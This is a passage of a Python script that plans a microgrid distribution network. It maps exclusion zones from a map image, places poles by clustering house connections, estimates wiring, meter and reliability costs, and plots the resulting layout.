m.ceil(exclusionBuffer/d_EW_between) #reformatted indexes array width \r\n bufferArrayHeight_NS = m.ceil(exclusionBuffer/d_NS_between)\r\n height_og = len(ExclusionMap_array[:,0,0])\r\n width_og = len(ExclusionMap_array[0,:,0])\r\n new_exclusions = np.zeros((width_new,height_new))\r\n indexes = []\r\n #t0 = time.time()\r\n \r\n for i in range((width_og-1),-1,-1):\r\n k = int((width_og-1-i)/reformatScaler)\r\n #print(str(i))\r\n #t1 = time.time()\r\n #print(str(t1-t0))\r\n for j in range(0,height_og,1):\r\n l = int(j/reformatScaler)\r\n #print(str(i)+\" \"+str(j))\r\n if ExclusionMap_array[j,i,0] != 255: #exclusion zones are both grey and black, safe zones are white (255,255,255)\r\n #set everything within buffer to 1\r\n if k < bufferArrayWidth_EW:\r\n if l < bufferArrayHeight_NS:\r\n new_exclusions[0:k+bufferArrayWidth_EW,0:l+bufferArrayHeight_NS] = 1\r\n elif l > height_og-bufferArrayHeight_NS:\r\n new_exclusions[0:k+bufferArrayWidth_EW,l-bufferArrayHeight_NS:height_new] = 1\r\n else:\r\n new_exclusions[0:k+bufferArrayWidth_EW,l-bufferArrayHeight_NS:l+bufferArrayHeight_NS] = 1\r\n elif k > width_new-bufferArrayWidth_EW:\r\n if l < bufferArrayHeight_NS:\r\n new_exclusions[k-bufferArrayWidth_EW:width_new,0:l+bufferArrayHeight_NS] = 1\r\n elif l > height_og-bufferArrayHeight_NS: \r\n new_exclusions[k-bufferArrayWidth_EW:width_new,l-bufferArrayHeight_NS:height_new] = 1\r\n else:\r\n new_exclusions[k-bufferArrayWidth_EW:width_new,l-bufferArrayHeight_NS:l+bufferArrayHeight_NS] = 1\r\n else:\r\n if l < bufferArrayHeight_NS:\r\n new_exclusions[k-bufferArrayWidth_EW:k+bufferArrayWidth_EW,0:l+bufferArrayHeight_NS] = 1\r\n elif l > height_og-bufferArrayHeight_NS: \r\n new_exclusions[k-bufferArrayWidth_EW:k+bufferArrayWidth_EW,l-bufferArrayHeight_NS:height_new] = 1\r\n else:\r\n new_exclusions[k-bufferArrayWidth_EW:k+bufferArrayWidth_EW,l-bufferArrayHeight_NS:l+bufferArrayHeight_NS] = 1\r\n del ExclusionMap_array\r\n print(\"finished remapping\")\r\n new_exclusions = np.flip(new_exclusions)\r\n \r\n for o in range(width_new):\r\n for p in range(height_new):\r\n if new_exclusions[o,p] == 1:\r\n indexes.append([o,p])\r\n indexes = np.array(indexes)\r\n print(\"finished new indexing\")\r\n\r\n \r\n #Save new indexes\r\n index_csv_name = \"indexes_reformatted_%s_bufferzone_%s.csv\" %(str(reformatScaler),str(exclusionBuffer))\r\n np.savetxt(index_csv_name,indexes, delimiter=\",\")\r\n return indexes\r\n#==============================================================================\r\n\r\n\r\n\r\n#=============================================================================\r\n# Get Distance between array indexes\r\ndef DistanceBWindexes(indexesA,indexesB,d_EW_between,d_NS_between):\r\n if len(indexesA) == 2 and len(indexesB) == 2:\r\n #This is a single index submission\r\n A_sqr = m.pow(((indexesA[0]-indexesB[0])*d_EW_between),2)\r\n B_sqr = m.pow(((indexesA[1]-indexesB[1])*d_EW_between),2)\r\n else:\r\n #This is multiple indexes\r\n A_sqr = np.zeros((len(indexesA), len(indexesB)))\r\n B_sqr = np.zeros((len(indexesA), len(indexesB)))\r\n for i in range(len(indexesA)):\r\n for j in range(len(indexesB)):\r\n #print(indexesA)\r\n A_sqr[i,j] = m.pow(((indexesA[i,0]-indexesB[j,0])*d_EW_between),2)\r\n #print(indexesA[i,0]-indexesB[j,0])\r\n #print((indexesA[i,0]-indexesB[j,0])*d_EW_between)\r\n #print(math.pow(((indexesA[i,0]-indexesB[j,0])*d_EW_between),2))\r\n B_sqr[i,j] = m.pow(((indexesA[i,1]-indexesB[j,1])*d_NS_between),2)\r\n DistanceAB = np.sqrt(A_sqr+B_sqr)\r\n return 
DistanceAB\r\n#=============================================================================\r\n\r\n#==============================================================================\r\n# Clustering of Connections for Initial Solution Pole Placement\r\ndef ClusteringConnections(indexes_conn,num_clusters):\r\n from sklearn import mixture\r\n \r\n X = np.copy(indexes_conn)\r\n\r\n cv_type = 'tied'\r\n gmm = mixture.GaussianMixture(n_components = num_clusters,covariance_type=cv_type)\r\n gmm.fit(X)\r\n clf = gmm \r\n Y_ = clf.predict(X) #Y_ the index is the connection # and the value is the pole\r\n #gmm.means_: the index is the pole #, the numbers are the indexes of that pole\r\n \r\n #round and convert means to integers\r\n means = np.copy(gmm.means_)\r\n for i in range(len(gmm.means_)):\r\n means[i][0] = int(means[i][0])\r\n means[i][1] = int(means[i][1])\r\n \r\n return Y_ ,means\r\n#==============================================================================\r\n\r\n\r\n#==============================================================================\r\n# Find non-exlcusion spot in growing circular manner\r\ndef FindNonExclusionSpot(index_x_og, index_y_og, index_excl_comp,range_limit,max_y,max_x):\r\n for i in range(range_limit):\r\n #Define limits\r\n x_min = int(index_x_og - i)\r\n if x_min < 0:\r\n x_min = 0\r\n x_max = int(index_x_og + i)\r\n if x_max > max_x:\r\n x_max = max_x\r\n y_min = int(index_y_og - i)\r\n if y_min < 0:\r\n y_min = 0\r\n y_max = int(index_y_og + i)\r\n if y_max > max_y:\r\n y_max = 0\r\n #Testing around spot\r\n #xmin and xmax\r\n for y in range(y_min,y_max):\r\n index_pole_comp = x_min + (y*0.00001)\r\n if not index_pole_comp in index_excl_comp:\r\n return x_min, y\r\n index_pole_comp = x_max + (y*0.00001)\r\n if not index_pole_comp in index_excl_comp:\r\n return x_min, y\r\n #ymin and ymax\r\n for x in range(x_min,x_max):\r\n index_pole_comp = x + (y_min*0.00001)\r\n if not index_pole_comp in index_excl_comp:\r\n return x, y_min\r\n index_pole_comp = x + (y_max*0.00001)\r\n if not index_pole_comp in index_excl_comp:\r\n return x, y_max\r\n \r\n #if nothing found in within range limit, return dummy number\r\n return 9000000,0\r\n#==============================================================================\r\n\r\n\r\n#==============================================================================\r\n# Matching poles and connections by closest distance\r\ndef MatchPolesConn(indexes_conn,indexes_poles,d_EW_between,d_NS_between):\r\n ConnPoles = np.zeros((len(indexes_conn[:,0]),2)) \r\n DistanceConnPoles = DistanceBWindexes(indexes_conn,indexes_poles,d_EW_between,d_NS_between)\r\n for i in range(len(ConnPoles[:,0])):\r\n ConnPoles[i,0] = np.argmin(DistanceConnPoles[i,:])\r\n ConnPoles[i,1] = np.min(DistanceConnPoles[i,:])\r\n return ConnPoles\r\n#==============================================================================\r\n\r\n#===============================================================================\r\n# Match Connections to Poles Simplified Version\r\n#Instead of trying to find a feasible solution, just create penalties that can be weighted in the optimization\r\ndef PolePlacement(reformatScaler,num_clusters,exclusionBuffer,range_limit,indexes_conn,indexes_excl,height,width,d_EW_between,d_NS_between,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min): \r\n \r\n #Get initial solution of pole indexes with Gaussian Mean Clustering\r\n #The mean of the clusters is the initial pole placement\r\n ConnPole_initial, 
initial_pole_placement = ClusteringConnections(indexes_conn,num_clusters)\r\n indexes_poles = np.copy(initial_pole_placement)\r\n #ConnPole: the index is the connection # and the value is the pole\r\n #initial_pole_placement: the index is the pole #, the numbers are the indexes of that pole\r\n\r\n #Check if pole placed on exclusion\r\n #If in exclusion zone, circle outwardly to find non-exclusion spot\r\n #Turn 2D index arrays to 1D for comparison\r\n index_pole_comp = initial_pole_placement[:,0] + np.dot(initial_pole_placement[:,1],0.00001)\r\n index_excl_comp = indexes_excl[:,0] + np.dot(indexes_excl[:,1],0.00001)\r\n for i in range(len(index_pole_comp)):\r\n if index_pole_comp[i] in index_excl_comp:\r\n #check surrounding areas for non-exclusion spot\r\n index_x_new, index_y_new = FindNonExclusionSpot(initial_pole_placement[i,0], initial_pole_placement[i,1], index_excl_comp,range_limit,height,width)\r\n if index_x_new == 9000000: #arbitary large number to act as signal\r\n print(\"No new pole placement found for pole \" +str(i)+\", try expanding pole placement region.\")\r\n else:\r\n #replace pole index location\r\n indexes_poles[i,:] = [index_x_new, index_y_new]\r\n #print(\"New pole placed at \"+str(i)+\" pole\")\r\n \r\n #Match Connections and Poles \r\n ConnPoles = MatchPolesConn(indexes_conn,indexes_poles,d_EW_between,d_NS_between)\r\n #Find in use poles and create new pole indexes\r\n indexes_poles_inuse_x = []\r\n indexes_poles_inuse_y = []\r\n for i in range(len(indexes_poles)):\r\n if i in ConnPoles[:,0]:\r\n indexes_poles_inuse_x.append(indexes_poles[i,0])\r\n indexes_poles_inuse_y.append(indexes_poles[i,1])\r\n indexes_poles_in_use_og = np.transpose(np.array([indexes_poles_inuse_x,indexes_poles_inuse_y]))\r\n #Redetermine match Connections and Poles \r\n ConnPoles = MatchPolesConn(indexes_conn,indexes_poles_in_use_og,d_EW_between,d_NS_between)\r\n #Calculate the wire distances from all the poles and connections\r\n total_wire_distance = sum(ConnPoles[:,1])\r\n #Calculate Cost due to poles and distances\r\n total_distance_BWPoles,Best_Wire_Cost,Best_Reliability_Cost,Best_Total_Cost, OnOff, DistancesBWPoles, num_conn_per_pole, total_time = WiringAlg(ConnPoles,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min,indexes_poles,d_EW_between,d_NS_between,\"False\")\r\n totalCost_minusReliability = PenaltiesToCost(total_wire_distance, num_clusters, ConnPoles,total_distance_BWPoles)\r\n totalCost = totalCost_minusReliability + Best_Reliability_Cost\r\n \r\n #Determine if any poles are too close by testing removing each pole\r\n #This takes too long with reliability\r\n #print(\"Testing pole removal\")\r\n Best_pole_indexes = np.copy(indexes_poles_in_use_og)\r\n Best_totalCost = np.copy(totalCost)\r\n Best_ConnPoles = np.copy(ConnPoles)\r\n Best_total_wire_distance = np.copy(total_wire_distance)\r\n Best_total_distance_BWPoles = np.copy(total_distance_BWPoles)\r\n Best_OnOff = np.copy(OnOff)\r\n #for i in range(len(indexes_poles_in_use_og)):\r\n # indexes_poles_in_use = np.delete(indexes_poles_in_use_og,i,0)\r\n # ConnPoles = MatchPolesConn(indexes_conn,indexes_poles_in_use,d_EW_between,d_NS_between)\r\n # total_wire_distance = sum(ConnPoles[:,1])\r\n # total_distance_BWPoles,Best_Wire_Cost,Best_Reliability_Cost,Best_Total_Cost, OnOff, DistancesBWPoles, num_conn_per_pole, total_time = WiringAlg(ConnPoles,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min,indexes_poles,d_EW_between,d_NS_between,\"False\")\r\n # 
totalCost_minusReliability = PenaltiesToCost(total_wire_distance, num_clusters, ConnPoles,total_distance_BWPoles)\r\n # totalCost = totalCost_minusReliability + Best_Reliability_Cost\r\n # if totalCost < Best_totalCost:\r\n # print(\"Removing Pole, cheaper without\")\r\n # Best_pole_indexes = np.copy(indexes_poles_in_use)\r\n # Best_totalCost = np.copy(totalCost)\r\n # Best_ConnPoles = np.copy(ConnPoles)\r\n # Best_total_wire_distance = np.copy(total_wire_distance)\r\n # Best_total_distance_BWPoles = np.copy(total_distance_BWPoles)\r\n # Best_OnOff = np.copy(OnOff)\r\n #print(\"Best total Cost and number of cluster\")\r\n #print(Best_totalCost)\r\n #print(num_clusters)\r\n #print(\"******************\")\r\n \r\n return Best_Reliability_Cost, Best_OnOff, Best_ConnPoles, Best_total_wire_distance, Best_total_distance_BWPoles, Best_pole_indexes, Best_totalCost\r\n\r\n#==============================================================================\r\n \r\n \r\n \r\n\r\n#==============================================================================\r\n# Calculate the Cost of the penalties to use as the minimizing optimization value\r\ndef PenaltiesToCost(total_wire_distance, num_poles_in_use, ConnPoles,total_distance_BWPoles):\r\n #Load all Econ input\r\n Econ_Parameters = pd.read_excel('uGrid_Input.xlsx', sheet_name = 'Econ')\r\n\r\n #Pull out costs needed for penalties\r\n Cost_Dist_wire = Econ_Parameters['Cost_Dist_wire'][0]\r\n Cost_Trans_wire = Econ_Parameters['Cost_Trans_wire'][0]\r\n Cost_Pole = Econ_Parameters['Cost_Pole'][0] + Econ_Parameters['Cost_Pole_Trans'][0]\r\n #Cost_Dist_Board = Econ_Parameters['Cost_Dist_Board'][0]\r\n\r\n #Calculate pole setup cost\r\n total_dist_wire_cost = Cost_Dist_wire*(total_wire_distance/1000) #cost is in km, wire distance is in m\r\n total_trans_wire_cost = Cost_Trans_wire*(total_distance_BWPoles/1000)\r\n #make total_wire_distance doubly as penalty\r\n total_pole_cost = num_poles_in_use*Cost_Pole\r\n #num_dist_boards = 0\r\n meter_cost_poles= []\r\n for j in range(num_poles_in_use):\r\n conn_per_pole = int(np.ceil(np.count_nonzero(ConnPoles[:,0]==j)))\r\n meter_cost = -0.0042*conn_per_pole**5 + 0.1604*conn_per_pole**4 - 2.3536*conn_per_pole**3 + 16.776*conn_per_pole**2 - 59.5*conn_per_pole + 111.25\r\n meter_cost_poles.append(meter_cost)\r\n total_smart_meter_cost = sum(meter_cost_poles)\r\n \r\n Total_cost = total_dist_wire_cost + total_trans_wire_cost + total_pole_cost + total_smart_meter_cost\r\n \r\n return Total_cost\r\n#============================================================================== \r\n \r\n\r\n##=============================================================================\r\n# Decide the number of poles and their places by cycling through PolePlacement\r\ndef PoleOpt(reformatScaler,minPoles,maxPoles,exclusionBuffer,range_limit,MaxDistancePoleConn,repeats,prob, Cost_kWh, wiring_trans_cost, restoration_time):\r\n \r\n #Load Files\r\n #Gather the information needed\r\n #Import csv file which has been converted from the klm file\r\n #This gives the points of connections which are houses to link to the distribution grid\r\n Connect_nodes = pd.read_excel('MAK_connections.xlsx', sheet_name = 'connections')\r\n Exclusion_nodes = pd.read_excel('MAK_exclusions.xlsx', sheet_name = 'MAK_exclusions')\r\n \r\n #Identify gps coordinate min and max to determine coordinates of edges of jpg image\r\n Longitude_exc = Exclusion_nodes['X']\r\n Latitude_exc = Exclusion_nodes['Y']\r\n #also convert these degrees to radians\r\n Lat_exc_min = 
m.radians(Latitude_exc.min()) #top of image (north)\r\n Lat_exc_max = m.radians(Latitude_exc.max()) #bottom of image (south)\r\n Long_exc_min = m.radians(Longitude_exc.min()) #left of image (east)\r\n Long_exc_max = m.radians(Longitude_exc.max()) #right of image (west)\r\n\r\n #Calculate the distance between the gps coordiantes using Haversine Formula\r\n #North South Distance #measuring latitude difference\r\n d_NS = GPStoDistance(Lat_exc_max,Lat_exc_min,Long_exc_max,Long_exc_max) #m\r\n #East West Distance #measuring longitude difference\r\n d_EW = GPStoDistance(Lat_exc_max,Lat_exc_max,Long_exc_max,Long_exc_min) #m\r\n\r\n #Import kml pdf file (of exclusions) and convert to jpg\r\n pages = convert_from_path('MAK_exclusions.pdf',500)\r\n for page in pages:\r\n page.save('MAK_exclusions.jpg','JPEG')\r\n \r\n #Convert JPG to array\r\n ExclusionMap = Image.open('MAK_exclusions.jpg')\r\n ExclusionMap_array = np.array(ExclusionMap)\r\n #Filter rgb value to 0 'non exclusion' and 1 'exclusion'\r\n #Black 0-0-0, White 255-255-255\r\n height = int(len(ExclusionMap_array[:,0])/reformatScaler) #this is y_index_max\r\n width = int(len(ExclusionMap_array[0,:])/reformatScaler) #this is x_index_max\r\n filename = \"index_maxes_%s.csv\" %str(reformatScaler)\r\n np.savetxt(filename,[height,width],delimiter=\",\")\r\n\r\n #Determine distance between reformatted pixels (between values in the array)\r\n d_EW_between = d_EW/width #m\r\n d_NS_between = d_NS/height #m\r\n filename = \"d_between_%s.csv\" %str(reformatScaler)\r\n np.savetxt(filename,[d_EW_between,d_NS_between],delimiter=\",\")\r\n\r\n #Load exlusion map, if not available then perform\r\n #This gathers the exclusion array indexes\r\n try:\r\n #print(\"in try loop\")\r\n index_csv_name = \"indexes_reformatted_%s_bufferzone_%s.csv\" %(str(reformatScaler),str(exclusionBuffer))\r\n indexes_excl = np.loadtxt(index_csv_name, delimiter=\",\")\r\n except:\r\n print(\"in except loop\")\r\n #quit()\r\n indexes_excl = ExclusionMapper1(ExclusionMap_array,reformatScaler,exclusionBuffer,d_EW_between,d_NS_between,width,height)\r\n\r\n #Match the connection locations to locations in the array\r\n #Find distance between east limit of image and connection\r\n try:\r\n #print(\"in try loop\")\r\n index_csv_name = \"indexes_conn_reformatted_%s.csv\" %str(reformatScaler)\r\n indexes_conn = np.loadtxt(index_csv_name, delimiter=\",\")\r\n except:\r\n d_Econnection = np.zeros(len(Connect_nodes))\r\n d_Nconnection = np.zeros(len(Connect_nodes))\r\n indexes_conn = np.zeros((len(Connect_nodes),2))\r\n for i in range(len(Connect_nodes)): #iteration through connections\r\n d_Econnection[i] = GPStoDistance(Lat_exc_min,Lat_exc_min,Long_exc_min,m.radians(Connect_nodes['longitude'][i])) #m\r\n #print(d_Econnection[i])\r\n #distance of connection to the east (left) (x index)\r\n d_Nconnection[i] = GPStoDistance(Lat_exc_min,m.radians(Connect_nodes['latitude'][i]),Long_exc_min,Long_exc_min) #m\r\n #print(d_Nconnection[i])\r\n #distance of connection to the north (top) (y index)\r\n #Get array index locations of all connections\r\n indexes_conn[i,0] = int(d_Econnection[i]/d_EW_between)\r\n #print(indexes_conn[i,0])\r\n indexes_conn[i,1] = int(d_Nconnection[i]/d_NS_between)\r\n #print(indexes_conn[i,1])\r\n index_csv_name = \"indexes_conn_reformatted_%s.csv\" %str(reformatScaler)\r\n np.savetxt(index_csv_name,indexes_conn, delimiter=\",\")\r\n \r\n #Find Poles, Wiring, and Cost\r\n lookback = 3 * repeats\r\n record_bests = np.zeros((maxPoles-minPoles)*repeats)\r\n p = 0\r\n i = 
minPoles\r\n NoDecrease = 0\r\n totalCost_soln = 9999999999999 #initialize with very high totalCost_soln\r\n while i < maxPoles and NoDecrease == 0:\r\n for j in range(repeats): #repeat at each cluster level to ensuring repeatability\r\n t0 = time.time()\r\n print(\"Number of poles tried is \"+str(i)+\" with \"+str(j+1)+\" out of \"+str(repeats)+\" attempts.\") \r\n \r\n Reliability_Cost, OnOff, ConnPoles, total_dist_wire_distance, total_trans_wire_distance, indexes_poles, totalCost = PolePlacement(reformatScaler,i,exclusionBuffer,range_limit,indexes_conn,indexes_excl,height,width,d_EW_between,d_NS_between,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min)\r\n if totalCost < totalCost_soln and max(ConnPoles[:,1]) < MaxDistancePoleConn:\r\n ConnPole_soln = np.copy(ConnPoles)\r\n total_dist_wire_distance_soln = np.copy(total_dist_wire_distance)\r\n total_trans_wire_distance_soln = np.copy(total_trans_wire_distance)\r\n indexes_poles_soln = np.copy(indexes_poles)\r\n totalCost_soln = np.copy(totalCost)\r\n num_initial_clusters = np.copy(i)\r\n OnOff_soln = np.copy(OnOff)\r\n Best_Reliability_Cost = np.copy(Reliability_Cost)\r\n print(\"Best total cost for this iteration is $\"+str(int(totalCost))+\", and the current best solution is $\"+str(int(totalCost_soln))+\".\")\r\n print(\"The maximum distance between house and pole is \"+str(int(max(ConnPoles[:,1])))+\"m, and limit is \"+str(MaxDistancePoleConn)+\"m.\")\r\n record_bests[p] = totalCost\r\n p += 1\r\n t1 = time.time()\r\n total_time = t1-t0\r\n print(\"Time for this pole count is \"+str(round(total_time, 2))+\".\")\r\n #Check if the solution has not gotten better for the last 3 pole # increases, if so solution is found and exit this loop\r\n if p > lookback:\r\n if min(record_bests[p-lookback:p]) > totalCost_soln:\r\n NoDecrease = 1 \r\n i += 1\r\n \r\n \r\n #Save solution pole indexes\r\n filename = \"indexes_poles_reformatted_%s_prob_%s_FullReliability_soln.csv\" %(str(reformatScaler),str(prob))\r\n np.savetxt(filename,indexes_poles_soln, delimiter=\",\")\r\n filename = \"ConnPoles_reformatted_%s_prob_%s_FullReliability_soln.csv\" %(str(reformatScaler),str(prob))\r\n np.savetxt(filename,ConnPole_soln, delimiter=\",\")\r\n filename_records = \"Wiring_OnOff_alg_prob_%s_FullReliability.csv\" %(str(prob))\r\n np.savetxt(filename_records,OnOff_soln, delimiter=\",\")\r\n \r\n return Best_Reliability_Cost, OnOff_soln,num_initial_clusters,ConnPole_soln, total_dist_wire_distance_soln, total_trans_wire_distance_soln, indexes_poles_soln, totalCost_soln, indexes_conn, indexes_excl\r\n#==============================================================================\r\n \r\n#==============================================================================\r\n# Plot between pole wiring\r\ndef PoleWiring(OnOff, indexes_poles):\r\n\r\n num_poles = len(indexes_poles[:,0])\r\n goodToGo = 0\r\n for i in range(num_poles):\r\n for j in range(i):\r\n if OnOff[i,j] == 1:\r\n match = np.array([[indexes_poles[i,0],indexes_poles[i,1]],[indexes_poles[j,0],indexes_poles[j,1]]]) \r\n if goodToGo == 0:\r\n goodToGo = 1\r\n wiringMatrix = match\r\n else:\r\n wiringMatrix = np.concatenate((wiringMatrix,match),axis=1)\r\n \r\n #Plot\r\n num_match = len(wiringMatrix[0,:])\r\n fig, ax = plt.subplots()\r\n for i in range(0,num_match-1,2):\r\n j = i + 1\r\n plt.plot(wiringMatrix[:,i],wiringMatrix[:,j])\r\n #plt.scatter(indexes_poles[:,0],indexes_poles[:,1],s=2,c='b')\r\n ax.set_aspect('equal')\r\n plotname = 
\"WiringBWPoles_prob_%s_FullReliability.png\" %(str(prob))\r\n plt.savefig(plotname, dpi=600)\r\n plt.show()\r\n#=============================================================================\r\n \r\n#==============================================================================\r\n# plot all wiring\r\ndef AllWiringPlot(OnOff, indexes_poles, indexes_conn, ConnPoles):\r\n \r\n #Pole Wiring\r\n num_poles = len(indexes_poles[:,0])\r\n goodToGo = 0\r\n for i in range(num_poles):\r\n for j in range(i):\r\n if OnOff[i,j] == 1:\r\n match = np.array([[indexes_poles[i,0],indexes_poles[i,1]],[indexes_poles[j,0],indexes_poles[j,1]]]) \r\n if goodToGo == 0:\r\n goodToGo = 1\r\n wiringMatrix = match\r\n else:\r\n wiringMatrix = np.concatenate((wiringMatrix,match),axis=1)\r\n \r\n #Plot\r\n num_match = len(wiringMatrix[0,:])\r\n fig, ax = plt.subplots()\r\n for i in range(0,num_match-1,2):\r\n j = i + 1\r\n plt.plot(wiringMatrix[:,i],wiringMatrix[:,j],color='black',linewidth=2)\r\n \r\n #Connections wiring\r\n num_conn = len(indexes_conn[:,0])\r\n for i in range(num_conn):\r\n pole = int(ConnPoles[i,0])\r\n x_s = [indexes_conn[i,0],indexes_poles[pole,0]]\r\n y_s = [indexes_conn[i,1],indexes_poles[pole,1]]\r\n plt.plot(x_s,y_s,color='green',linewidth=1)\r\n \r\n #Save and Show\r\n ax.set_aspect('equal')\r\n plotname = \"AllWiring_prob_%s_FullReliability.png\" %(str(prob))\r\n plt.savefig(plotname, dpi=600)\r\n plt.show()\r\n \r\n \r\n##=============================================================================\r\n# Plot Pole Placement Solution\r\ndef PlotPoleSolutions(OnOff,indexes_poles,indexes_conn,indexes_excl,ConnPoles):\r\n cmap = plt.cm.get_cmap('hsv', len(indexes_poles[:,0]))\r\n \r\n fig, ax = plt.subplots()\r\n for i in range(len(indexes_poles[:,0])):\r\n for j in range(len(ConnPoles[:,0])):\r\n if ConnPoles[j,0] == i:\r\n plt.scatter(indexes_conn[j, 0], indexes_conn[j, 1], s=1,c=cmap(i),marker='.')#, color=color)\r\n plt.scatter(indexes_poles[i,0],indexes_poles[i,1],s=3,c=cmap(i), marker= '^')\r\n ax.set_aspect('equal')\r\n plotname = \"SolutionPlot_prob_%s_FullReliability.png\" %(str(prob))\r\n plt.savefig(plotname, dpi=600)\r\n plt.show()\r\n\r\n fig, ax = plt.subplots()\r\n plt.scatter(indexes_excl[:,0],indexes_excl[:,1],s=1,c ='r',marker= 's')\r\n plt.scatter(indexes_poles[:,0],indexes_poles[:,1], s=1, c='b', marker='s')\r\n ax.set_aspect('equal')\r\n plotname = \"ExclusionsPlotwSolnPoles_prob_%s_FullReliability.png\" %(str(prob))\r\n plt.savefig(plotname, dpi=600)\r\n plt.show()\r\n \r\n PoleWiring(OnOff, indexes_poles)\r\n\r\n AllWiringPlot(OnOff, indexes_poles, indexes_conn, ConnPoles) \r\n\r\n##=============================================================================\r\n\r\n#==============================================================================\r\n# Calculate Closest Pole to POI (point of interconnection) to generation\r\ndef POI_Pole(lat_Generation,long_Generation,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles):\r\n EW_dis = GPStoDistance(Lat_exc_min,Lat_exc_min,Long_exc_min,long_Generation)\r\n NS_dis = GPStoDistance(Lat_exc_min,lat_Generation,Long_exc_min,Long_exc_min)\r\n EW_index = int(EW_dis/d_EW_between)\r\n NS_index = int(NS_dis/d_NS_between)\r\n indexes_gen = [EW_index,NS_index]\r\n #Calculate distances between generation and pole\r\n #Individually feed in each pair\r\n num_poles = len(indexes_poles[:,0])\r\n Distance_Gen_Poles = np.zeros(num_poles) \r\n for i in range(num_poles):\r\n Distance = 
DistanceBWindexes(indexes_gen,indexes_poles[i,:],d_EW_between,d_NS_between) #Type error: only size-1 arrays can be converted to Python Scalars\r\n Distance_Gen_Poles[i] = Distance\r\n closest_pole = np.argmin(Distance_Gen_Poles)\r\n \r\n return closest_pole\r\n#==============================================================================\r\n\r\n#==============================================================================\r\n# Calc total load on poles\r\ndef PoleLoads(ConnPoles,num_poles):\r\n num_conns = len(ConnPoles[:,0])\r\n load_per_connection = kW_max/num_conns\r\n PoleLoad_matrix = np.zeros(num_poles)\r\n for i in range(num_poles):\r\n PoleLoad_matrix[i] = int(np.ceil(np.count_nonzero(ConnPoles[:,0]==i)))*load_per_connection \r\n \r\n return PoleLoad_matrix\r\n#==============================================================================\r\n \r\n#==============================================================================\r\n# Edges matrix: n-1 on line loss. |pole 1|pole 2|load loss|\r\ndef LineLosses(OnOff,ConnPoles,num_poles,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles):\r\n #Load Lat and Long Gen\r\n lat_Generation = m.radians(Net_Parameters['lat_Generation'][0])\r\n long_Generation = m.radians(Net_Parameters['long_Generation'][0])\r\n POI = POI_Pole(lat_Generation,long_Generation,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles)\r\n #Calculate load amount at each pole\r\n PoleLoad_matrix = PoleLoads(ConnPoles,num_poles)\r\n #Convert OnOff to list of edges (lines)\r\n num_edges = int(np.sum(OnOff)/2)\r\n Edges = np.zeros((num_edges,3))\r\n edge_count = 0\r\n for i in range(len(OnOff[:,0])):\r\n for j in range(i):\r\n if OnOff[i,j] == 1:\r\n OnOff_temp = np.copy(OnOff)\r\n OnOff_temp[i,j] = 0\r\n OnOff_temp[j,i] = 0\r\n #Calculate Load loss from this edge\r\n visited = np.zeros(num_poles)\r\n visited = Check_connections(POI,visited,OnOff_temp) #connected components to generation POI\r\n load_loss = 0\r\n for k in range(num_poles):\r\n if visited[k] == 0:\r\n load_loss = load_loss + PoleLoad_matrix[k]\r\n #Append Edges matrix with edge and load loss from loss of that edge (line)\r\n Edges[edge_count,:] = [i,j,load_loss]\r\n edge_count += 1\r\n return Edges\r\n#============================================================================== \r\n\r\n\r\n#==============================================================================\r\n# Internal connected components recursive. 
This works because undirected\r\ndef Check_connections(i,visited,OnOff):\r\n for j in range(len(OnOff[i,:])):\r\n if OnOff[i,j] == 1 and visited[j] == 0: #if j in a pole (999 is default for not a pole, and that pole is not visited)\r\n visited[j] = 1\r\n Check_connections(j,visited,OnOff)\r\n return visited\r\n#==============================================================================\r\n \r\n#==============================================================================\r\n# Connected Components Code\r\ndef ConnectedComponents(OnOff):\r\n num_poles = len(OnOff[:,0])\r\n #Check # connected components\r\n visited = np.zeros(num_poles)\r\n conn_comp = 0\r\n for i in range(num_poles):\r\n if visited[i] == 0:\r\n visited[i] = 1\r\n conn_comp += 1\r\n visited = Check_connections(i,visited,OnOff)\r\n #else if visited continue to next pole\r\n \r\n return conn_comp, visited #return visited to varify everything has been visited\r\n#==============================================================================\r\n \r\n\r\n#==============================================================================\r\n# Wiring Algorithm\r\ndef WiringAlg(ConnPoles,prob, Cost_kWh, wiring_trans_cost, restoration_time,Long_exc_min,Lat_exc_min,indexes_poles,d_EW_between,d_NS_between,standalone):\r\n t0 = time.time()\r\n\r\n #Load solution pole indexes\r\n if standalone == \"True\":\r\n filename = \"indexes_poles_reformatted_%s_prob_%s_soln.csv\" %(str(reformatScaler),str(prob))\r\n indexes_poles = np.loadtxt(filename, delimiter=\",\")\r\n filename = \"d_between_%s.csv\" %str(reformatScaler)\r\n [d_EW_between,d_NS_between] = np.loadtxt(filename,delimiter=\",\")\r\n \r\n #Calculate Distances between all poles\r\n DistancesBWPoles = DistanceBWindexes(indexes_poles,indexes_poles,d_EW_between,d_NS_between)\r\n num_poles = len(indexes_poles[:,0])\r\n \r\n \r\n #Sort Distances between poles shortest connections to longest\r\n DistancesBWPoles_sorted = np.sort(DistancesBWPoles,axis=1) #First value in row will be 0, need to skip first column\r\n \r\n #Create Initial Solution\r\n goodToGo = 0\r\n num_conn_per_pole = 3 #starting value\r\n while goodToGo == 0:\r\n OnOff = np.zeros((num_poles,num_poles)) \r\n for i in range(num_poles):\r\n for j in range(1,num_conn_per_pole): #start at 1 to avoid first column of zeros. 
Nothing is stopping this from going over num_poles\r\n #print(\"i\")\r\n #print(i)\r\n #print(\"j\")\r\n #print(j)\r\n #print(\"*********\")\r\n ind = np.where(DistancesBWPoles == DistancesBWPoles_sorted[i,j]) #This is going to give two values, need adjust so only one half of matrix is considered\r\n #Place in use connection\r\n x = ind[0][0]\r\n y = ind[1][0]\r\n OnOff[x,y] = 1\r\n #make sure connection is also noted from the other pole's side (only will add up one side for total distances though so not double counting)\r\n OnOff[y,x] = 1\r\n # Check for islands\r\n components, visited = ConnectedComponents(OnOff) #need to make sure OnOff is being filled in way that there aren't rows of zeros \r\n if components == 1:\r\n # Calculate Load loss risk\r\n Edges = LineLosses(OnOff,ConnPoles,num_poles,Long_exc_min,Lat_exc_min,d_EW_between,d_NS_between,indexes_poles) \r\n total_load_loss_risk = sum(Edges[:,2])\r\n Reliability_Risk_Cost = 